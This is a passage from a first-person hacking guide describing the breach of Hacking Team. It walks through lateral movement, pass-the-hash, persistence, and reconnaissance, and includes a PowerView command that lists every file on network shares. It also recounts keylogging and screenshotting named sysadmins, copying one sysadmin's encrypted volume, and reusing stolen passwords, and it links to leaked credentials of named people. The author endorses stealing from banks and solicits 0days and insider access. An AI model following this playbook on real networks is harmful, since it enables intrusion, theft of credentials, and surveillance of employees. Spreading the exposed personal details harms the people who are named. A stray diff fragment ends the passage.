[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ | |||
[11] https://adsecurity.org/?p=2277 | |||
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems | |||
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py | |||
"In place" Movement: | |||
1) Token Stealing | |||
Once you have admin access on a computer, you can use the tokens of the | |||
other users to access resources in the domain. Two tools for doing this are | |||
incognito [1] and the mimikatz token::* commands [2]. | |||
2) MS14-068 | |||
You can take advantage of a validation bug in Kerberos to generate Domain | |||
Admin tickets [3][4][5]. | |||
3) Pass the Hash | |||
If you have a user's hash, but they're not logged in, you can use | |||
sekurlsa::pth [2] to get a ticket for the user. | |||
4) Process Injection | |||
Any RAT can inject itself into other processes. For example, the migrate | |||
command in meterpreter and pupy [6], or the psinject [7] command in | |||
powershell empire. You can inject into the process that has the token you | |||
want. | |||
5) runas | |||
This is sometimes very useful since it doesn't require admin privileges. | |||
The command is part of windows, but if you don't have a GUI you can use | |||
powershell [8]. | |||
[1] https://www.indetectables.net/viewtopic.php?p=211165 | |||
[2] https://adsecurity.org/?page_id=1821 | |||
[3] https://github.com/bidord/pykek | |||
[4] https://adsecurity.org/?p=676 | |||
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html | |||
[6] https://github.com/n1nj4sec/pupy | |||
[7] http://www.powershellempire.com/?page_id=273 | |||
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 | |||
----[ 13.2 - Persistence ]------------------------------------------------------ | |||
Once you have access, you want to keep it. Really, persistence is only a | |||
challenge for assholes like Hacking Team who target activists and other | |||
individuals. To hack companies, persistence isn't needed since companies never | |||
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple | |||
high-uptime servers. On the off chance that they all reboot at the same time, | |||
I have passwords and a golden ticket [1] as backup access. You can read more | |||
about the different techniques for persistence in windows here [2][3][4]. But | |||
for hacking companies, it's not needed and it increases the risk of detection. | |||
[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ | |||
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ | |||
[3] http://www.hexacorn.com/blog/category/autostart-persistence/ | |||
[4] https://blog.netspi.com/tag/persistence/ | |||
----[ 13.3 - Internal reconnaissance ]------------------------------------------ | |||
The best tool these days for understanding windows networks is Powerview [1]. | |||
It's worth reading everything written by it's author [2], especially [3], [4], | |||
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still | |||
many windows 2000 and 2003 servers without powershell, you also have to learn | |||
the old school [8], with programs like netview.exe [9] or the windows builtin | |||
"net view". Other techniques that I like are: | |||
1) Downloading a list of file names | |||
With a Domain Admin account, you can download a list of all filenames in | |||
the network with powerview: | |||
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | | |||
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | | |||
select fullname | out-file -append files.txt} | |||
Later, you can read it at your leisure and choose which files to download. | |||
2) Reading email | |||
As we've already seen, you can download email with powershell, and it has a | |||
lot of useful information. | |||
3) Reading sharepoint | |||
It's another place where many businesses store a lot of important | |||
information. It can also be downloaded with powershell [10]. | |||
4) Active Directory [11] | |||
It has a lot of useful information about users and computers. Without being | |||
Domain Admin, you can already get a lot of info with powerview and other | |||
tools [12]. After getting Domain Admin, you should export all the AD | |||
information with csvde or another tool. | |||
5) Spy on the employees | |||
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi | |||
(one of Hacking Team's sysadmins) gave me access to a Nagios server which | |||
gave me access to the rete sviluppo (development network with the source | |||
code of RCS). With a simple combination of Get-Keystrokes and | |||
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang | |||
[14], and GPO, you can spy on any employee, or even on the whole domain. | |||
[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView | |||
[2] http://www.harmj0y.net/blog/tag/powerview/ | |||
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ | |||
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ | |||
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ | |||
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview | |||
[7] https://adsecurity.org/?p=2535 | |||
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E | |||
[9] https://github.com/mubix/netview | |||
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ | |||
[11] https://adsecurity.org/?page_id=41 | |||
[12] http://www.darkoperator.com/?tag=Active+Directory | |||
[13] https://github.com/PowerShellMafia/PowerSploit | |||
[14] https://github.com/samratashok/nishang | |||
--[ 14 - Hunting Sysadmins ]---------------------------------------------------- | |||
Reading their documentation about their infrastructure [1], I saw that I was | |||
still missing access to something important - the "Rete Sviluppo", an isolated | |||
network with the source code for RCS. The sysadmins of a company always have | |||
access to everything, so I searched the computers of Mauro Romeo and Christian | |||
Pozzi to see how they administer the Sviluppo network, and to see if there | |||
were any other interesting systems I should investigate. It was simple to | |||
access their computers, since they were part of the windows domain where I'd | |||
already gotten admin access. Mauro Romeo's computer didn't have any ports | |||
open, so I opened the port for WMI [2] and executed meterpreter [3]. In | |||
addition to keylogging and screen scraping with Get-Keystrokes and | |||
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 | |||
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a | |||
Truecrypt volume, I waited until he'd mounted it and then copied off the | |||
files. Many have made fun of Christian Pozzi's weak passwords (and of | |||
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I | |||
included them in the leak as a false clue, and to laugh at him. The reality is | |||
that mimikatz and keyloggers view all passwords equally. | |||
[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ | |||
[2] http://www.hammer-software.com/wmigphowto.shtml | |||
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/ | |||
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde | |||
[5] http://pwnwiki.io/#!presence/windows/find_files.md | |||
[6] http://archive.is/TbaPy | |||
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ | |||
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt | |||
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ | |||
--[ 15 - The bridge ]----------------------------------------------------------- | |||
Within Christian Pozzi's Truecrypt volume, there was a textfile with many | |||
passwords [1]. One of those was for a Fully Automated Nagios server, which had | |||
access to the Sviluppo network in order to monitor it. I'd found the bridge I | |||
needed. The textfile just had the password to the web interface, but there was | |||
a public code execution exploit [2] (it's an unauthenticated exploit, but it | |||
requires that at least one user has a session initiated, for which I used the | |||
password from the textfile). | |||
[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt | |||
[2] http://seclists.org/fulldisclosure/2014/Oct/78 | |||
--[ 16 - Reusing and resetting passwords ]-------------------------------------- | |||
Reading the emails, I'd seen Daniele Milan granting access to git repos. I | |||
already had his windows password thanks to mimikatz. I tried it on the git | |||
server and it worked. Then I tried sudo and it worked. For the gitlab server | |||
and their twitter account, I used the "forgot my password" function along with | |||
my access to their mail server to reset the passwords. | |||
--[ 17 - Conclusion ]----------------------------------------------------------- | |||
That's all it takes to take down a company and stop their human rights abuses. | |||
That's the beauty and asymmetry of hacking: with 100 hours of work, one person | |||
can undo years of work by a multi-million dollar company. Hacking gives the | |||
underdog a chance to fight and win. | |||
Hacking guides often end with a disclaimer: this information is for | |||
educational purposes only, be an ethical hacker, don't attack systems you | |||
don't have permission to, etc. I'll say the same, but with a more rebellious | |||
conception of "ethical" hacking. Leaking documents, expropriating money from | |||
banks, and working to secure the computers of ordinary people is ethical | |||
hacking. However, most people that call themselves "ethical hackers" just work | |||
to secure those who pay their high consulting fees, who are often those most | |||
deserving to be hacked. | |||
Hacking Team saw themselves as part of a long line of inspired Italian design | |||
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, | |||
and government, as part of a long tradition of Italian fascism. I'd like to | |||
dedicate this guide to the victims of the raid on the Armando Diaz school, and | |||
to all those who have had their blood spilled by Italian fascists. | |||
[1] https://twitter.com/coracurrier/status/618104723263090688 | |||
--[ 18 - Contact ]-------------------------------------------------------------- | |||
To send me spear phishing attempts, death threats in Italian [1][2], and to | |||
give me 0days or access inside banks, corporations, governments, etc. | |||
[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ | |||
[2] https://twitter.com/CthulhuSec/status/619459002854977537 | |||
only encrypted email please: | |||
https://securityinabox.org/es/thunderbird_usarenigmail | |||
-----BEGIN PGP PUBLIC KEY BLOCK----- | |||
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx | |||
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g | |||
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x | |||
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h | |||
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 | |||
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh | |||
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL | |||
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac | |||
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf | |||
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 | |||
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys | |||
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 | |||
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E | |||
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai | |||
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm | |||
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F | |||
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 | |||
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo | |||
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK | |||
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA | |||
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR | |||
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi | |||
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq | |||
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB | |||
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k | |||
=E5+y | |||
-----END PGP PUBLIC KEY BLOCK----- | |||
If not you, who? If not now, when? | |||
_ _ _ ____ _ _ | |||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |||
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) |
@ -0,0 +1,7 @@ | |||
##Internet of Things | |||
###Security not included. | |||
http://nodered.org/ | |||